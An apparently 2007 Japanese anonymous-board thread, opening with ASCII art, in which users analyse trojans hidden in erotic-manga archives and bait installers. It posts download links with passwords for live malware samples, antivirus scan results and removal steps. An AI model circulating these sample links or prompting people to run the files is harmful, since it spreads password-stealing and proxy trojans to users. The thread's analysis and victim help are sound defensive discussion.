-''~　　　　　|　　　　＼`ー----‐'´!　iヽ､
　　　　　　　ヽ　　 　　 ＼　　　　 /　 i　 ｀ヽ､
　　　　　　　　＼　　　　　丶＿／　 　|　　　　＼
　　　　　　　　　ヽ　　　　 ／Ｏ ＼　　 |　　　　　 ＼

＿　　　　　　　　 　 ＿_/　
＿　　/　＿＿ 　　/　　￣/ 　　.へ　　　　　　　| 　　　.へ　　　　　　　　　　　　　　|.　　|
　　　/.　＿＿| 　 　　　　/.　　/　　＼　　　　_ノ 　 　/　　＼　　へ　.へ　.／　　_ノ　　│
＿_ノ　　＿＿|　　　　 ／ 　　/　　　　＼　￣ |　　　/　　　　＼　　｀´　｀´　　￣ |.　　　・





　　　 　　　　＜⌒／ヽ-、_＿_　（山崎）
　　　　　　　＜_/＿＿＿＿／

　　　　 ＜⌒／ヽ-、_＿_　（浜田）
　　　　＜_/＿＿＿＿／

　 ＜⌒／ヽ-、_＿_　（遠藤）
　＜_/＿＿＿＿／

＿　　　　　　　　 　 ＿_/　
＿　　/　＿＿ 　　/　　￣/ 　　.へ　　　　　　　| 　　　.へ　　　　　　　　　　　　　　　　　　　　　　| 　　|
　　　/.　＿＿| 　 　　　　/.　　/　　＼　　　　_ノ 　 　/　　＼　　へ　.へ　.へ　.へ　.へ　.／　　_ノ　　│
＿_ノ　　＿＿|　　　　 ／ 　　/　　　　＼　￣ |　　　/　　　　＼　　｀´　｀´　 ｀´　 ｀´　｀´　　￣ |.　　　・



　　　　　　　　　　　oO○　ZZzz…
　　　　　　　　　　o
　　　 　　　　＜⌒／ヽ-、_＿_
　　　　　　　＜_/＿＿＿＿／

　　　　 ＜⌒／ヽ-、_＿_　i||!!
　　　　＜_/＿＿＿＿／
　　　　　　　　　　　　　i||!
　 ＜⌒／ヽ-、_＿_
　＜_/＿＿＿＿／ ﾌﾌﾌﾌｗ

　　/__７　./''７　　＿＿＿　　＿/￣/＿　　　ヘ　　　　　 　_ノ￣/　 ヘ　　　　　 　　　　　　　　　　_ノ￣/　/￣/
　 /__７　./　/　　/＿　 /　 /　＿＿　　/ ／　　＼　　/￣　　／ ／　　＼　　┌────┐/￣　　.／　/　 /
　　＿__ノ　/　　/＿　 /　　ー'　___ノ　/　|_／ ＼　＼ ￣/　/　　|_／ ＼　＼ └────┘￣/　/　　 /＿/
　/＿___,.／　　/＿＿/　　　　 /____／　　　 　　 ＼/　 /__/　 　　　　　 ＼/　　　　　　　　　　 /__/　　 /＿/

　　　　　　　　　　　　_ ､ -──¬‐-､
　　　　　　　　　　 ／　　　　　　 　 　 ＼
　　　　　　　　　 /　　　　　　　　　　　　 ヽ
　　　　　　　　 /　　　,----､　　　＿_　 　 ヽ
　　　　　　　　 !　　 /　　 　 `'''''''´　　｀ヽ 　 i
　　　　　 　 　 |　　/　　　　　　　 　 　 　 }　 |
　　　　　　　 _⊥＜　,,,,,,,,__　　 　 　 　 　 |　 !
　　　　　 　 /r＼ｆ‐┴─-＜_　　≦二ヽ__レ'!
　　　　　　　!ノ!. ヽ 厂二二┐￣r─‐-､　/⌒!
　　　　　　　l ヽ 　 !ヽ＿＿//＾ヽ! ￣｀ ﾉ/iヽ /
　　　　　　　＼__!　`ー--／!　 ＼ヽ--'/├'/
　　　　　　　　　|　　　／ L _　__）ヽ￣　 /‐'
　　　　　　　　 ,┤　i〈 ､＿＿＿＿_, 〉　/
　　　　　　　 /　 !　　ヽ＼+┼┼+/　 /　　誰かワシを呼んだか？
　　　　　 __/　　 ヽ　　　　`ー‐‐'´　/
　　, -‐''"　i　　　　＼　　　　　　　人
-''~　　　　　|　　　　＼`ー----‐'´!　iヽ､
　　　　　　　ヽ　　 　　 ＼　　　　 /　 i　 ｀ヽ､

＿　　　　　　　　 　 ＿_/　
＿　　/　＿＿ 　　/　　￣/ 　　.へ　　　　　　　| 　　　.へ　　　　　　　　　　　　　　|.　　|
　　　/.　＿＿| 　 　　　　/.　　/　　＼　　　　_ノ 　 　/　　＼　　へ　.へ　.／　　_ノ　　│
＿_ノ　　＿＿|　　　　 ／ 　　/　　　　＼　￣ |　　　/　　　　＼　　｀´　｀´　　￣ |.　　　・

　　　　　　　　　　　　_ ､ -──¬‐-､
　　　　　　　　　　 ／　　　　　　 　 　 ＼
　　　　　　　　　 /　　　　　　　　　　　　 ヽ
　　　　　　　　 /　　　,----､　　　＿_　 　 ヽ
　　　　　　　　 !　　 /　　 　 `'''''''´　　｀ヽ 　 i
　　　　　 　 　 |　　/　　　　　　　 　 　 　 }　 |
　　　　　　　 _⊥＜　,,,,,,,,__　　 　 　 　 　 |　 !
　　　　　 　 /r＼ｆ‐┴─-＜_　　≦二ヽ__レ'!
　　　　　　　!ノ!. ヽ 厂二二┐￣r─‐-､　/⌒!
　　　　　　　l ヽ 　 !ヽ＿＿//＾ヽ! ￣｀ ﾉ/iヽ /
　　　　　　　＼__!　`ー--／!　 ＼ヽ--'/├'/
　　　　　　　　　|　　　／ L _　__）ヽ￣　 /‐'
　　　　　　　　 ,┤　i〈 ､＿＿＿＿_, 〉　/
　　　　　　　 /　 !　　ヽ＼+┼┼+/　 /　　あんまワシを苛めんといてや〜
　　　　　 __/　　 ヽ　　　　`ー‐‐'´　/
　　, -‐''"　i　　　　＼　　　　　　　人
-''~　　　　　|　　　　＼`ー----‐'´!　iヽ､
　　　　　　　ヽ　　 　　 ＼　　　　 /　 i　 ｀ヽ､

http://up3.viploader.net/mini/src/viploader110564.zip
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.107【2007】
356 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2007/02/15(木) 21:32:53
>>321
試しにマイクロソフトが無料配布している、Windowsエクスプローラのコンテクスト・メニューから
ZIPの圧縮、解凍ができるようになるプログラムで解凍してみたら、それだけでimg_01_0.jpg.exeが
実行されてしまいまつた。
Windowsアップデートはちゃんとやっているけど、ZIPの圧縮、解凍ができるようになるプログラムは
アップデートされていなくて、バッファ・オーバーフローの脆弱性があるバージョンということでつね。
ちなみにimg_01_0.jpg.exe実行後は姿が消えてしまい、正常なjpgファイルしか見えなくなりまつた。
そしてアンチウイルスが強制的に無効状態になりまつた。

357 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2007/02/15(木) 21:35:03
>ちなみにimg_01_0.jpg.exe実行後は姿が消えてしまい、正常なjpgファイルしか見えなくなりまつた。

感染していることを気付かせない細工もしているウイルスなんだな。

358 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2007/02/15(木) 21:42:58
WinRAR3.62 Noah3.195 Lhaplus1.54β1で解凍してみたが
img_01_0.jpg.exeはそのままフォルダ内に残っている。
しっかし、Windows純正品がだめってなんなんだよ。

360 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2007/02/15(木) 22:25:45
>>356
ﾏｲｸﾛｿﾌﾄ純正のもので解凍すると、それだけで自動感染するということは、
あちこちのスレにそのサンプルのリンクが貼ってあるから、
まだ対応できているアンチウイルスも少ないので、大量に感染者を出しているんだろうなぁ。

361 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2007/02/15(木) 22:36:12 　　　New!!
しかもそのサンプルは、ウイルスの中で最も悪質なキンタマ系亜種だという書き込みを見たぞ。＞他のスレで。
これは自治スレにも書いて注意を促した方がいいかもな。

ええ〜ほんとかよこれ

信じられんな〜

AntiVir 7.3.1.37 02.15.2007 TR/Spy.Banker.cjo
Authentium 4.93.8 02.15.2007 no virus found
Avast 4.7.936.0 02.14.2007 no virus found
AVG 386 02.14.2007 no virus found
BitDefender 7.2 02.15.2007 no virus found
CAT-QuickHeal 9.00 02.15.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.15.2007 no virus found
DrWeb 4.33 02.15.2007 no virus found
eSafe 7.0.14.0 02.15.2007 Win32.Delf.ce
eTrust-Vet 30.4.3400 02.15.2007 no virus found
Ewido 4.0 02.14.2007 no virus found
Fortinet 2.85.0.0 02.15.2007 no virus found
F-Prot 4.2.1.29 02.15.2007 no virus found
F-Secure 6.70.13030.0 02.15.2007 Trojan-Proxy.Win32.Delf.ce
Ikarus T3.1.0.31 02.15.2007 Email-Worm.Win32.Bagle.BR
Kaspersky 4.0.2.24 02.15.2007 Trojan-Proxy.Win32.Delf.ce
McAfee 4963 02.14.2007 no virus found
Microsoft 1.2204 02.15.2007 no virus found
NOD32v2 2062 02.15.2007 no virus found
Norman 5.80.02 02.15.2007 no virus found
Panda 9.0.0.4 02.15.2007 no virus found
Prevx1 V2 02.15.2007 no virus found
Sophos 4.14.0 02.13.2007 no virus found
Sunbelt 2.2.907.0 02.15.2007 VIPRE.Suspicious
Symantec 10 02.15.2007 no virus found
TheHacker 6.1.6.057 02.14.2007 no virus found
UNA 1.83 02.14.2007 no virus found
VBA32 3.11.2 02.14.2007 no virus found
VirusBuster 4.3.19:9 02.15.2007 no virus found

こういうのはカスペとAntiVirがホント強いな
強いというか速いというか

img_01_0.jpg.exeを実行しても本体消えんぞ
system32内に別名同一ファイルがコピーされレジストリ追加でOS起動時に実行される
砂箱とレジストリモニタ使ってりゃアンチウイルスなくても普通に感染しない
案外つまらないトロイだった。ガセ臭い情報も散乱してるな。製作者本人が吹聴してんのかね

>>490
あとｐｆファイルが追加されてエラーメッセージがでたぐらいだね

＞＜←この顔文字のやつがあやしい

Symantecもうちょっと頑張らなきゃ！有料でしょ！？もう。

・・・バスターもマカフィーもNOD32も有料です

Antivir優秀だねえ。フリーなのが怖いくらい。

バスター、マカフィー、NOD32、ノートン、有料ならもっと頑張れ！

アンチウイルスを殺されるのか。怖いな。

>>490
作者臭いのがニュー速に居たぞ。
もうdat落ちしてるけど
http://news23.2ch.net/test/read.cgi/news/1171526120/922-

 922  Name： 番組の途中ですが名無しです  [] Date： 2007/02/15(木) 20:04:37  ID: OjZb+N420  Be:
（省略）

 954  Name： 番組の途中ですが名無しです  [] Date： 2007/02/15(木) 20:18:11  ID: OjZb+N420  Be:
    おまえらワロタ
    >>922は
    「１５０秒ごとにニュー速に>>1と書き込むソフト」の失敗作
    テストしないでばら撒いたからエラーが出ることにあとで気づいた
    つまり無害

 963  Name： 番組の途中ですが名無しです  [] Date： 2007/02/15(木) 20:23:00  ID: OjZb+N420  Be:
    >>960
    あ？Ｄｅｌｐｈｉ様は容量食うんだよハゲ
    アスパックなら２００Ｋ切るけどプロテクトにしないとウイルス判定食らうからね

 966  Name： 番組の途中ですが名無しです  [] Date： 2007/02/15(木) 20:25:35  ID: OjZb+N420  Be:
    >>964
    先生とバスターはスルーじゃないの？
    俺は対策ソフト入れてないからわからん

>>497
逮捕ｸﾙｺﾚｗｗｗｗｗｗｗ
研究目的でばらまいたりしないなら問題ないだろうがばらまいたらﾀｲｰﾎ

昨日からいろんなスレに貼り付けていたのは作者だったのか

インターネットが発明されて以来抱えている病原菌の素みたいなもんだな。
こんな奴が世界に何万人もいるというのが現実。

>>490
興味をひかれたんでwindows既定で.zipを展開してみた

ファイルをコピーできませんとエラーメッセージがでて解凍後のファイルは0byteになった
.jpg.exeだけがなぜか消えた　((((;゜Д゜)))











ただそれだけ
アーカイバの脆弱性をねらったんだろうけど.exe実行するとこまではいかなかったみたいねｗ
kiddy 乙って感じ？ｗ

777 774 2007/02/14(水) 19:25:08
ttp://kuro33.sakura.ne.jp/kuro-up/
のkuro_0016.zip　ORIG　story　　 .zipがそれです
DLパスは1111
現在virustotalでチェック中
他スレからで悪いんだどこれ実行したところよくわからないんだけどウィルス感染？

きょうはパス

↓が踏んでくれるであろう

やってやるか

こういう時こそインスコマンが出て来てくれよ

>>502
これ15メガ以上あるからvirustotalに送れなくね？

>>502
実行ファイル7z圧縮したら131KBになったぞｗｗｗｗｗｗｗｗｗ

誰か踏む？

7z,rarで提出してみたがどこもヒットしなかった。

rarで提出したらVBA32だけヒットしてた。
suspected of RAR.MailBomb

VMware入れてないからパス。

このスレ久々に浮上してきたな

もっと刺激的な物はないのか、貴様らｗ

俺もVMware Playerとかいれてねーから無理だ

いれてるけどパス

>>508
ONEGAI

>>502
os9だからふんでも良いがダウンできない。

2kで実行したが何も起こらなかった
何か起こったかもしれんがレジストリは参照も書き換えもなかった

実行したけどコマンドプロントが一瞬出て現在何もなし。
XP

なんか何にもなさそう・・・。

俺も仮想ＰＣでやったけどなんもなかったよ

よすれあげ

よ・・・良スレ・・・ｗ

ニュー即にあったこのZIPファイルなんだけど、誰かWinXPの解凍機能をアップデートしていない状態で、その機能を使って解凍することできない？

パス
saebaxyz
http://s-io.net/up/3/_/jump/1171633749943399.6xOn8A

ttp://www.vipper.org/vip444637.zip.html
pass：news

↑を間違って踏んでしまいました。どういう実行ファイルなのでしょうか？

>>525
どこかで見たな。ウイルスじゃないか？。
解凍ファイルに*****.jpg.exe
があるなら、それ。

>>525
TR/Spy.Banker.cjo または Trojan-Proxy.Win32.Delf.ce
詳細はしらん

一昨日の物じゃないか
ネタが古いよ

途中で送信してしまった。
それはウイルス。

AVGとAntiVirは対応してるらしい。

まだばら撒いてるのか。アホだなあ。

MD5一致。>>486-　のファイルと同じ。

Avast!反応無し＼(＾O＾)／ｵﾜﾀ

結局>>525はどうなったんだ？
いろいろ情報が右往左往してるがどうやら失敗作で実害はさほどなさそう（責任は持たんが）なのでまぁ安心しれ。

それよりantivirは偉大だな

>>533
アホ臭くてまじめに検証してないんだよなあ。

・・・ニュー速に大量爆撃されてる荒らしと発生時期が合致してるような気がしてきたぞ。
ちょっと踏んでくるﾉｼ

>>534
人柱乙。

オレも踏んでみたら外部にアクセス試みようとしたが拒否ったらそれ以来目に見えた活動が見られないんだが。
こういうときにスキルがあるヤツはうらやましいぜ！

踏んできた。通信は無し。
ただ、別スレで報告のあった[　Not Implemented ]ってダイアログではなく、
[Connection refused (Error #10061)]と出た。
俺は4種類のエロ漫画zipアーカイブを持っててその中の.exeは全て同一だったんだが、
いろんなタイプのをそこら中でばら撒いてるのか、それとも環境の違いによるものか。

＞スキルがあるヤツはうらやましいぜ！
えへへ。間違えてAdmin権限で踏んじゃったorz

http://oshiete1.goo.ne.jp/qa2756449.html
だれかエロ漫画のせいだって教えてきてあげてｗ

ノートンでも反応なし。　VM(Win98SE)で踏んだところ。
>>536 と同じようなダイアログが何かの拍子に出現する。

だれか、ノートンに送った？

マカフィ使いなオレは試すまでもなく未対応だぜ！！

あやしいファイルの動きを詳しく見たければ砂箱つかうべし！よーくわかる。

>>540
はぁ？砂箱で動きが詳しく見れる？何でこんな低知能がレスしてんの？

>>538
virustotalに送信するとそこから各ウイルス対策ソフトメーカーに行くようになってる。
トレンドマイクロは参加してないので個人的に送ってるけど。

virustotal経由での対応は期待しないほうがいい
数ヶ月かかってる希ガス
個別に送ったほうが速い

んでも、こんな極東の掲示板で撒かれたつまらんウザイウェアにもかなりのベンダーが対応したやん。
俺が投げた時はKasperskyとF-secure以外はスルーだったし。
つーかこの二つは早すぎ。新種の原田にも速攻で対応してたし。

>>544
それはセキュ版の住人が各ベンダーに速攻おくったからでしょｗ
俺が投げた時はantivirがヒューリスティックで反応してたぐらいだった
それからカスペとNODはp-desでつくられたやつをヒューリステイックと既知のシグネチャでほとんど見抜ける
ny厨は乗り換えたほうがいい

>>544
(´・ω・｀) AntiVirも速いけど休日はやってないみたいだな。
新種送ったけど平日のときは速かったが休日はまったくねえｗ

ヒューリステイックは弱いが対応が早いカスペ
ヒューリステイックは強いが対応が遅いNOD
うーむ・・・

>>539
マカフィには投げつけておいた

http://n.limber.jp/n/T9aXgc6HD
P:0218

これ頼む

>>549
中身は漫画のスキャンでウィルスは無し。

■[他] だましえ

http://file.beautynet.co.kr/updata/bbs/board_1613/13581.jpg

Firefoxでは怖くないが、IEでは怖い。

ヒント：おもちかえりぃ


だれかこの謎わかる？

Ctrl+Aだろ。
知らんけど。

天才！！！
正解！！！

Ctrl+A
http://2ch-news.net/up/up42881.jpg

うぜえな。何年も前に流行ったトリックだ。

そのわりにはあんま見たこと無いな

NOD32、AntiVirでも検出できないウイルス
http://www.virustotal.com/vt/en/resultadof?3d00c9371ecc4e1fe3c57f961afcca3d

引用元

http://d.hatena.ne.jp/lumin/20070130

>>538
AntiVir 7.3.1.37 02.18.2007 TR/Spy.Banker.cjo
Authentium 4.93.8 02.16.2007 no virus found
Avast 4.7.936.0 02.18.2007 no virus found
AVG 386 02.17.2007 Proxy.KPA
BitDefender 7.2 02.18.2007 no virus found
CAT-QuickHeal 9.00 02.16.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.18.2007 no virus found
DrWeb 4.33 02.18.2007 no virus found
eSafe 7.0.14.0 02.18.2007 Win32.Delf.ce
eTrust-Vet 30.4.3410 02.18.2007 no virus found
Ewido 4.0 02.18.2007 Proxy.Delf.ce
Fortinet 2.85.0.0 02.18.2007 W32/Delf.CE!tr
F-Prot 4.2.1.29 02.16.2007 no virus found
F-Secure 6.70.13030.0 02.17.2007 Trojan-Proxy.Win32.Delf.ce
Ikarus T3.1.0.31 02.18.2007 Email-Worm.Win32.Bagle.BR
Kaspersky 4.0.2.24 02.18.2007 Trojan-Proxy.Win32.Delf.ce
McAfee 4965 02.16.2007 no virus found
Microsoft 1.2204 02.18.2007 no virus found
NOD32v2 2068 02.18.2007 Win32/TrojanProxy.Delf.CE
Norman 5.80.02 02.16.2007 no virus found
Panda 9.0.0.4 02.18.2007 no virus found
Prevx1 V2 02.18.2007 no virus found
Sophos 4.14.0 02.18.2007 no virus found
Sunbelt 2.2.907.0 02.17.2007 VIPRE.Suspicious
Symantec 10 02.18.2007 Backdoor.Trojan
TheHacker 6.1.6.059 02.16.2007 Trojan/Proxy.Delf.ce
UNA 1.83 02.16.2007 no virus found
VBA32 3.11.2 02.17.2007 Trojan-Proxy.Win32.Delf.ce
VirusBuster 4.3.19:9 02.17.2007 no virus found

>>536


[　Not Implemented ]の者です。
感染源はそのファイルか分かりませんが、同じVIP系アップローダーで感染したので、それかもしれません。
エロ漫画だったはずですが、題名も内容も忘れてしまいました。商業誌だったのは確かですが。
もうかなりのセキリュティソフト試してみましたが、解決せず、これは初期化かもわからんねってかんじっす。
そういえばシステムの復元なんて手もありましたっけ。


>>559

ノートン先生の最新版ダウンロードしてフルスキャンしてみましたが、反応せず。
もう、なにがなんだか(　´Д｀)=з

>>560
ｴﾛﾏﾝｶﾞにつられてexeを実行してしまった人へ
※以下OSがXP前提の話

C:\WINDOWS\system32 に
IMJPMIG69.EXE というファイルがあったら削除

「スタート」→「ファイル名を指名して実行」→「regedit」
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に IMJPMIG69.EXE という名前があったら削除

再起動して様子見

※上記の内容がよく分からない、該当ファイルが見当たらないという場合
1.システムの復元もしくはOSの再インストール
2.回線引っこ抜いて寝る

【緊急!】ウィルス即行駆除方法【助けて!】
http://pc10.2ch.net/test/read.cgi/sec/1091174837/810

ノートンじゃねえので試せよ。ここは初心者相談スレじゃないぞ？

エロマンガ、パスは全部vip

ttp://uploader.xforce.jp/src/xF3227.zip.html　[Low]　膨らみ始めたエッチな年頃
ttp://s-io.net/up/3/_/jump/1171863544626858.dkTitq　蟲が来るぞ
ttp://s-io.net/up/6/_/jump/1171863726611524.mcJDZu　村
ttp://up3.viploader.net/mini/src/viploader112335.zip.html　[いーむす・アキ]渚の乙女達
ttp://upload.jerog.com/up/moe005576.zip.html　[みさくらなんこつ] ヒキコモリ健康法

これ頼む

鑑定スレじゃねえ。VIPでやれ。

>>564
ttp://www.dotup.org/uploda/www.dotup.org1110.txt.html

>>561

親切にありがとうございます。おかげさまで解決しました。


>>562　>>563


スレ汚し申し訳ない。

ttp://up3.viploader.net/mini/src/viploader112748.zip.html
中のexeをおねげえします
解凍pass = qwe

>>568
ttp://vista.crap.jp/img/vi7204447336.png
システムファイルが幾つか削除されて上のウィンドウが出た。

>>569
PCの挙動はどうだい、おかしい所ある？

ネットに繋がらなくなった。VirusTotalに送ってみたけど、何処も対応してないみたい。
ttp://www.virustotal.com/vt/en/resultadof?f8610259efb64a081da272ad5fef38c8

>>568
中の実行ファイル、日時が2001年5月とかだが。
これって新物なのかい？

最後まで進めると
「システムへの影響はありません、これはジョークソフトです」
と出るけどどうなんだろ、俺のパソは特に問題無く普通に動いてる

おまえらさあ、あやしいファイルを実行するのはいいけどよ、
てめえの個人情報が万が一漏れてどうなろうと知ったことではないが
外に漏れたら他人に損害を与えるような情報ファイルは絶対に置いておくなよ。

そんな環境で踏んでるやつは馬鹿だろｗｗ

さらなる人柱求む

>>575
わざわざ踏んでる時点で馬鹿確定なんだけどなｗ

高卒でも、モン卒でもべつにいいじゃん。
バカ同士仲良くしようぜ！

FAKEか・・・・

こんなんだし。インチキくせえな。

ウィルスのインストールを開始します B "#????$ Form2 & ' ( 2 5-   J  ?  6  D F?.   Command1
ウィルス情報 (Xｯ・ ?・   bar2 ? MSComctlLib.ProgressBar h・・?  -LB P   !C4   E*  ﾂ  喚・    
 ?? ?ｻE    ・ｫ         ????????l・ ﾞ・ l・ ?   Label3 (ｯ? ?.   Label2 code         : h(ﾏ? ?A   Label1 !
 virus name :     J_happy birthday hH・? ?   ?ﾌ1 ﾋﾜ9・aE聴P5]{ｵ蠎? 儂沫oﾊ・・Oｭ3
冉ﾏｷ ｪ `ﾓ・                                    O     Form1
ウィルス情報 B "#????$ Form1 & ' ( 5-   J    ・  D F?%   Command1 O K hｿw ?:   Label7
あらゆるデータを削除します ﾀg? ?P   Label6 0 それにより以後動作させたプログラムをすべて破壊し
 ﾀ?・? ?J   Label5 * システムの内部に特殊なコードを進入させます

ttp://zetubou.mine.nu/timer/file/bomber36292_h5.exe

>>581
デコードできん。コーデック入れるのもめんどいからパス。

>>581
解凍したら拡張子rmの動画だった
RealPlayer入れてないから確認できんけど問題ないだろ。

>>568
画像�A
ttp://www.nya-taloda.jpn.org/2MB/src/up2605.png
ttp://www.nya-taloda.jpn.org/2MB/src/up2606.png

問題なしっぽい

ジョークソフトだな。

なんかnyだかshareだかでPS2用のトロイが流れたらしいな。

>>586
ただの捏造＆メモカ消去プログラム

それをトロイの木馬というんじゃないのか。

なんか寝ぼけてた。

( ﾟдﾟ)ｴ?

ひぐらしか。
なんかPCで実行するとキャッシュとダウンフォルダが削除されるとか喚いていたが。
実行するってなんだ？　実行ファイルでも付いてんのか？

>>591
デーモンでマウントしたりするのとかかな？かな？

やっべ。復元ソフトなんか良いのないか？
とりあえず1回使えればおｋ。フリーか体験版でも良いんだが。

怪しいファイル寺子屋ｽ

全然スレの趣旨と関係ねえじゃねえか。

AVGのスレから誘導されてきました。
ベクターのこの｢キーボード」というアプリがウイルスと判定されます。
　　http://www.vector.co.jp/soft/win95/art/se204371.html
>>3のJotti's malware scanでスキャンしてみましたが、いくつかのエンジンでウイルスと判定されます。
こいつはウイルスなんでしょうか？

作者のHPもあって、日記ソフトのスレでもそれなりの人気はあるソフトの作者さんでも
あるのですが、
「キーボード」のReadmeには
　ちなみに、このソフトは起動させておけばずっと音が出るので、
　そのまま文章などを書くとジャラジャラ鳴って楽しいです♪
とか書いてあります。
無問題ですか？

この類の誤検知じゃないかな
ttp://lhsp.s206.xrea.com/works/info.html

このアプリも「Hot Soup Processor」を利用している模様

それでも実行して試す他は無いと思うが、それは他の人に任す

一応貼っとこう
結果だけ見るとマルウェアにしか見えないけど…

・keyboard.exe
ttp://www.virustotal.com/vt/en/resultadof?f4ccd807882d68103c13c064b18958b1
ttp://fileinfo.prevx.com/fileinfo.asp?PXC=253b1995557

・Hspmidi.dll
ttp://www.virustotal.com/vt/en/resultadof?f6b70175874b6257570d2cfa3fe7c98a

HSPの誤検出

HSPでウィルス作られたんだ。
凄いじゃない、HSP。

http://www.jetcityorange.com/toys/MosquitoRingtone.wav

これ聞こえるひとと聞こえないひとがいるらしい

>>600
波形確認してみたが、こりゃコンピューターで合成して作った音だね。
無理やり可聴域まで引っ張って聞いてみたけど、完全なプログラムによるノイズです。

聞こえなかったのか？

開けなかったけど高周波の音の予感
20代くらいから聞こえなくなるってやつ

>>602
聞こえなかったね。
音声信号が波じゃなくて細かいDOTで記録されてた。
あまり見た事の無いノイズパターンだな、完全に規則正しく並んでた。
あと基本録音レベルが低かったな。
波形の最適化をして、そのデータをCD-RWにでも焼いて、
ちゃんとしたAudio機器で聞けば、ホワイトノイズとして聞くことができるかもしれない。

PCによっては音が出てないなんてこともあるかもね

若者にしか聞こえない音　〜聴覚はけっこういい加減？〜
ttp://www.itmedia.co.jp/anchordesk/articles/0701/19/news029.html

17000 Hz Mosquito Cell Phone Ringtone
ttp://www.jetcityorange.com/MosquitoRingtone.html

なんかちっちゃくピーて感じのが聞こえた

あーボリュームあげたら聞こえるね
うぃんうぃんうぃんうぃんって感じの音
アナライザで信号拾った画面きゃぷったんで、貼っとくね
ttp://10e.org/elup/img/elup1707.jpg

年取ってるから聞こえると嬉しい、物凄く不愉快な音なのにｗ

>>609
マジで不快だよなこの音。
海外では着メロにしてるそうだ。
なぜなら年取った先生には聞こえないから

ttp://vipperup.orz.hm/uploader/src/viup33860.zip.html

P　1111
cg.exe
html.exe
index.html.exe
はじめにお読み下さい.txt.exe

フェイク

ttp://www8.axfc.net/uploader/15/so/N15_17000.zip.html
key:WinRAR
ttp://up3.viploader.net/mini/src/viploader114040.zip.html
key:ad-aware

crack.wrar37b.exe - TROJ_AGENT.VAP
aaw6jp_Setup.exe - TSPY_LDPINCH.TF

Trojan-Downloader.Win32.Agent.auv
crack.wrar37b.exe

Trojan-PSW.Win32.LdPinch.bnk
aaw6jp_Setup.exe

Complete scanning result of "CRACK.WRAR37B.zip", processed in VirusTotal at 02/27/2007 03:03:15 (CET).

[ file data ]
* name: CRACK.WRAR37B.zip
* size: 129259
* md5.: 81c2ade466bf4533952dd86f45685546
* sha1: 85841c0f585ff0cf34675083160f75177dc14d28

[ scan result ]
AntiVir 7.3.1.38/20070226 found [TR/Dldr.Agent.auv.16]
Authentium 4.93.8/20070226 found [W32/Downloader.BDAU]
AVG 386/20070225 found [Downloader.Agent.IQJ]
eSafe 7.0.14.0/20070227 found [Win32.Agent.auv]
Ewido 4.0/20070226 found [Downloader.Agent.auv]
F-Prot 4.3.1.45/20070226 found [W32/Downloader.BDAU]
F-Secure 6.70.13030.0/20070227 found [Trojan-Downloader.Win32.Agent.auv]
Fortinet 2.85.0.0/20070226 found [W32/Agent.AUV!tr.dldr]
Ikarus T3.1.1.3/20070226 found [Trojan-Downloader.Win32.Agent.auv]
Kaspersky 4.0.2.24/20070227 found [Trojan-Downloader.Win32.Agent.auv]
NOD32v2 2082/20070226 found [Win32/TrojanDownloader.Agent.NJC]
Norman 5.80.02/20070226 found [W32/DLoader.dam]
Panda 9.0.0.4/20070226 found [Trj/Downloader.MZB]
Prevx1 V2/20070227 found [Dropper.Payload]
TheHacker 6.1.6.065/20070226 found [Trojan/Downloader.Agent.auv]
VBA32 3.11.2/20070226 found [Trojan-Downloader.Win32.Agent.auv]

Complete scanning result of "AAW6JP_SETUP.zip", processed in VirusTotal at 02/27/2007 02:48:20 (CET).

[ file data ]
* name: AAW6JP_SETUP.zip
* size: 255547
* md5.: 39e3083a87feee3d7b1e61fe351ffc49
* sha1: a7f775df4107421dfb8ee1c1e7a3be4c1cfae4e0

[ scan result ]
AntiVir 7.3.1.38/20070226 found [TR/Crypt.XPACK.Gen]
Authentium 4.93.8/20070226 found [could be a corrupted executable file]
AVG 386/20070225 found [PSW.Ldpinch.EOZ]
CAT-QuickHeal 9.00/20070226 found [(Suspicious) - DNAScan]
eSafe 7.0.14.0/20070227 found [Win32.LdPinch.bnk]
Ewido 4.0/20070226 found [Trojan.LdPinch.bnk]
F-Secure 6.70.13030.0/20070227 found [Trojan-PSW.Win32.LdPinch.bnk]
Fortinet 2.85.0.0/20070226 found [W32/LdPinch.BNK!tr.pws]
Ikarus T3.1.1.3/20070226 found [Trojan-PWS.Win32.LdPinch.bnk]
Kaspersky 4.0.2.24/20070227 found [Trojan-PSW.Win32.LdPinch.bnk]
NOD32v2 2082/20070226 found [Win32/PSW.LdPinch.BNK]
Norman 5.80.02/20070226 found [W32/LdPinch.HPL]
Panda 9.0.0.4/20070226 found [Suspicious file]
Sunbelt 2.2.907.0/20070224 found [VIPRE.Suspicious]
TheHacker 6.1.6.065/20070226 found [Trojan/PSW.LdPinch.bnk]
UNA 1.83/20070226 found [Win32.CRYPT.virus]
VBA32 3.11.2/20070226 found [Trojan-PSW.Win32.LdPinch.bnk]
VirusBuster 4.3.19:9/20070226 found nothing

↑ｽﾏｿ、VirusBuster 4.3.19:9/20070226 found nothing
消し忘れた。

ぁゃιぃ

ﾛﾘｦﾀ

ネタが

ない

あげ

今日ネトラン買ったらこのスレからネタひろってんな
モスキート悪用促進してんじゃねーよ

>>624
犯罪行為堂々と推薦してる雑誌ですから

まじか

>>624
今に始まったこっちゃねぇ

>>624
kwsk

p88

わたくし、とあるカルト団体の批判をmixiでやってるんですが、
怪しいファイルがメールで届けられたんです。
本来なら掲示板のログのはずなんですが、
拡張子がない。
それから、goo mailからダウンロードするたびにファイル名が変わる。
http://kuro33.sakura.ne.jp/kuro-up/index.html
kuro_0264.txt
これでございます。
パスはnews

どなたかお力をお貸しください。

ちなみに、拡張子は便宜的に適当につけたものです。

ネトランもホンと馬鹿者が多いな。

何で 上祐史浩のmixiが こんなとこに貼ってあんだよｗ

諸先輩方の検証を頂きたいのですが、下記ＵＲＬは楽器の
tab譜が充実しているサイトだと思います。Ｓ＆Ｇの「The BOXER」
を検索すると、Windowsが何かをＤＬしようとします。
すぐキャンセルしますが、nortonもウィルスの反応し
問題を解決してくれました。便利なサイトなので利用
したいのですが、止めた方がいいでしょうか？
それとも利用するに当たり注意する方法があれば
教えていただけないでしょうか？

